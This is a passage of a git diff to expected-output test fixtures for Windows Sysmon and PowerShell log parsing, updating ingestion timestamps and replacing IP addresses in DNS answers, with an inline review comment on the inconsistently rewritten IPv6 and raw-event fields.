Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21727,7 +21455,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-10-14T04:10:32.314005139Z", + "ingested": "2021-12-09T13:49:44.740143400Z", "code": "24", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e24\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e24\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T15:04:48.607343500Z'/\u003e\u003cEventRecordID\u003e10757412\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='6444'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 15:04:48.592\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-aa1b-602f-a600-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2144\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\u003c/Data\u003e\u003cData Name='Session'\u003e1\u003c/Data\u003e\u003cData Name='ClientInfo'\u003euser: DESKTOP-I9CQVAQ\\luks\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA256=7ADB1CF1A75973079C055F929573AE92557A8C0E5B0E38A6A5427E412FB73D59,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21785,7 +21513,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.314006427Z", + "ingested": "2021-12-09T13:49:44.740149300Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e32\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\gfdkimpbcpahaombhbimeihdjnejgicl\\def\\ee4a6e45-bffd-49f4-98ae-32aebcc890b5.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.339\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21853,11 +21581,11 @@ "type": "CNAME" }, { - "data": "40.121.17.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -21865,7 +21593,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -21873,7 +21601,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -21882,12 +21610,12 @@ } ], "resolved_ip": [ - "40.121.17.79", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, 
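Review bot: The IPv6 answers `2001:503:a83e::2:30`, `2001:503:231d::2:30` and `2001:503:83eb::30` are kept as context in the -21882 hunk while their IPv4 siblings (`192.5.6.30`, `192.33.14.30`, `192.26.92.30`) are rewritten, so this event still carries public addresses outside the subset the commit is standardising on; the same three addresses also remain in `dns.resolved_ip` and in the `QueryResults` text of `event.original` in the -21905 hunk that follows. If the goal is to keep only supported test addresses in the fixtures, the IPv6 entries need the same treatment, using IPv6 members of that subset if it has any, and the `event.original` string must be edited in step so it stays consistent with the parsed `dns.answers`/`dns.resolved_ip` fields. Note also that the IPv4 substitutes are RFC 1918 addresses (`192.168.6.30`, `192.168.14.30`, `192.168.92.30`) rather than members of the public subset, so any enrichment the pipeline applies only to public addresses will no longer be exercised for these answers; that may be intended, but it differs from the `89.160.20.156` replacement used for the first answer. Separately, every A record in the hunks shown now resolves to `89.160.20.156` regardless of query name, so a mix-up between events' resolved addresses would no longer be caught by this fixture; if the supported subset offers more than one address, varying it per query name keeps the events distinguishable.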
@@ -21905,19 +21633,19 @@ "c.urs.microsoft.com" ], "ip": [ - "40.121.17.79", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.314007688Z", + "ingested": "2021-12-09T13:49:44.740155100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:49:52.105Z", 
diff --git a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json
index 051e1de4c0f..ba9b68dedcd 100644
--- a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json
+++ b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json
@@ -47,7 +47,7 @@ }, "event": { "sequence": 35, - "ingested": "2021-06-14T13:23:14.028841700Z", + "ingested": "2021-12-09T13:50:22.454903100Z", "code": "600", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e600\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e6\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T13:21:43.183180900Z'/\u003e\u003cEventRecordID\u003e1089\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eCertificate\u003c/Data\u003e\u003cData\u003eStarted\u003c/Data\u003e\u003cData\u003e\tProviderName=Certificate\n\tNewProviderState=Started\n\n\tSequenceNumber=35\n\n\tHostName=Windows PowerShell ISE Host\n\tHostVersion=5.1.17763.1007\n\tHostId=86edc16f-6943-469e-8bd8-ef1857080206\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe C:\\Users\\vagrant\\Desktop\\lateral.ps1\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=9d21da0b-e402-40e1-92ff-98c5ab1137a9\n\tPipelineId=15\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e600\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e6\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T13:25:04.656426900Z'/\u003e\u003cEventRecordID\u003e1266\u003c/EventRecordID\u003e\u003cChannel\u003eWindows 
PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eRegistry\u003c/Data\u003e\u003cData\u003eStarted\u003c/Data\u003e\u003cData\u003e\tProviderName=Registry\n\tNewProviderState=Started\n\n\tSequenceNumber=1\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=44b8d66c-f5a2-4abb-ac7d-6db73990a6d3\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e600\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e6\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-06-04T07:25:04.857430200Z'/\u003e\u003cEventRecordID\u003e18640\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eCertificate\u003c/Data\u003e\u003cData\u003eStarted\u003c/Data\u003e\u003cData\u003e\tProviderName=Certificate\n\tNewProviderState=Started\n\n\tSequenceNumber=8\n\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tHostId=99a16837-7392-463d-afe5-5f3ed24bd358\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", 
@@ -103,7 +103,7 @@ }, "event": { "sequence": 13, - "ingested": "2021-06-14T13:23:14.028855300Z", + "ingested": "2021-12-09T13:50:22.454906900Z", "code": "400", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T07:00:30.891423500Z'/\u003e\u003cEventRecordID\u003e1492\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ServerRemoteHost\n\tHostVersion=1.0.0.0\n\tHostId=2458050c-5e21-47a6-bbdf-41ef2151b519\n\tHostApplication=C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=405e84eb-9ca3-40d8-a4da-cf6ed1b38ed2\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T07:01:14.371507600Z'/\u003e\u003cEventRecordID\u003e1511\u003c/EventRecordID\u003e\u003cChannel\u003eWindows 
PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=83c6a631-910d-4530-bec2-18b2d0fc380a\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=056a5045-a7bb-49c6-9a9d-2ea95acea751\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:32:51.989256800Z'/\u003e\u003cEventRecordID\u003e1579\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=Windows PowerShell ISE Host\n\tHostVersion=5.1.17763.1007\n\tHostId=f3d0acd6-4ec1-4e0a-9c8e-27ee07eec3ab\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe 
C:\\Users\\vagrant\\Desktop\\patata.ps1\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=24067d05-e98a-4fbb-9cda-020e4c65017d\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-06-04T07:20:27.747227500Z'/\u003e\u003cEventRecordID\u003e18591\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tHostId=7018c049-c75b-4e02-9c0f-6761b97e1657\n\tEngineVersion=2.0\n\tRunspaceId=6ebeca05-d618-4c66-a0d8-4269d800d099\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", 
@@ -205,7 +205,7 @@ }, "event": { "sequence": 17, - "ingested": "2021-06-14T13:23:14.028864100Z", + "ingested": "2021-12-09T13:50:22.454911400Z", "code": "800", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-02-26T09:37:40.487241500Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant-2019\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003e Add-Type -AssemblyName System.IO.Compression.FileSystem\n\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=17\n\n\tUserId=VAGRANT-2019\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=ac3c99ce-7983-4996-807e-6a689eaba50b\n\tHostApplication=powershell -executionpolicy bypass \u0026amp; { if (Test-Path variable:global:ProgressPreference){set-variable -name variable:global:ProgressPreference -value 'SilentlyContinue'};. 
c:/Windows/Temp/packer-ps-env-vars-5e5637dd-15a9-73e0-889a-c01f541a8bc6.ps1; \u0026amp;'c:/Windows/Temp/script-5e5637dd-5626-019d-027a-02e78baaacc9.ps1'; exit $LastExitCode }\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=6a447a2c-693e-4d41-948d-129b455b2569\n\tPipelineId=1\n\tScriptName=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psm1\n\tCommandLine= Add-Type -AssemblyName System.IO.Compression.FileSystem\n\u003c/Data\u003e\u003cData\u003eCommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression.FileSystem\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:33:26.376993100Z'/\u003e\u003cEventRecordID\u003e1843\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003e\u0026amp; { Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=135\n\n\tUserId=VAGRANT\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=aae5217d-054f-435f-9968-4b5bebf12116\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=a87e8389-57c7-4997-95ff-f82f644965bf\n\tPipelineId=71\n\tScriptName=\n\tCommandLine=\u0026amp; { Set-StrictMode -Version 1; 
$this.Exception.InnerException.PSMessageDetails }\u003c/Data\u003e\u003cData\u003eCommandInvocation(Set-StrictMode): \"Set-StrictMode\"\nParameterBinding(Set-StrictMode): name=\"Version\"; value=\"1.0\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:33:26.393089000Z'/\u003e\u003cEventRecordID\u003e1846\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eImport-LocalizedData LocalizedData -filename ArchiveResources\n\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=141\n\n\tUserId=VAGRANT\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=aae5217d-054f-435f-9968-4b5bebf12116\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=a87e8389-57c7-4997-95ff-f82f644965bf\n\tPipelineId=71\n\tScriptName=\n\tCommandLine=Import-LocalizedData LocalizedData -filename ArchiveResources\n\u003c/Data\u003e\u003cData\u003eCommandInvocation(Import-LocalizedData): \"Import-LocalizedData\"\nParameterBinding(Import-LocalizedData): name=\"FileName\"; value=\"ArchiveResources\"\nParameterBinding(Import-LocalizedData): name=\"BindingVariable\"; value=\"LocalizedData\"\nNonTerminatingError(Import-LocalizedData): \"Cannot find the Windows PowerShell data file 'ArchiveResources.psd1' in directory 'C:\\Gopath\\src\\github.com\\elastic\\beats\\x-pack\\winlogbeat\\en-US\\', or in 
any parent culture directories.\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:33:26.393089000Z'/\u003e\u003cEventRecordID\u003e1847\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003e\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=143\n\n\tUserId=VAGRANT\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=aae5217d-054f-435f-9968-4b5bebf12116\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=a87e8389-57c7-4997-95ff-f82f644965bf\n\tPipelineId=71\n\tScriptName=\n\tCommandLine=\u003c/Data\u003e\u003cData\u003eCommandInvocation(Out-Default): \"Out-Default\"\nParameterBinding(Out-Default): name=\"InputObject\"; value=\"Cannot find the Windows PowerShell data file 'ArchiveResources.psd1' in directory 'C:\\Gopath\\src\\github.com\\elastic\\beats\\x-pack\\winlogbeat\\en-US\\', or in any parent culture directories.\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", 
